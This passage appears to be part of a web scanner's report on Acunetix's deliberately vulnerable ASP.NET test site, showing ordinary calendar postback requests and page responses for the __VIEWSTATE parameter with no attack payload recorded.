style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8275&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCALUCIiNoIZGRknr0SMlb3QYfEURG5641z85C9KaM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLErNLuAQLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgApM%2BFVb3B2%2BO0a0AMMeEIIypx5OH
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:43:37 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCALUCIiNoIZGRknr0SMlb3QYfEURG5641z85C9KaM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLErNLuAQLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgApM+FVb3B2+O0a0AMMeEIIypx5OH" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:White" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1147 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,147 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8291&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAyeYaldoIZGRkOm8Q2UdXUtUhApUPGG5g%2FO9Gj34%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLktuFIAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DAr%2BTz8IMAr%2BTz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk%2FQwC19nk%2FQwC19mYkAQC19mYkAQC19nM%2BQIC19nM%2BQIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa%2Fw8CqOCa%2Fw8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACQlJhOzDz%2FujZ0nuJe8t5BKSysKM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:23:33 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAyeYaldoIZGRkOm8Q2UdXUtUhApUPGG5g/O9Gj34=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLktuFIAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DAr+Tz8IMAr+Tz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk/QwC19nk/QwC19mYkAQC19mYkAQC19nM+QIC19nM+QIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa/w8CqOCa/w8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACQlJhOzDz/ujZ0nuJe8t5BKSysKM=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:White" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" 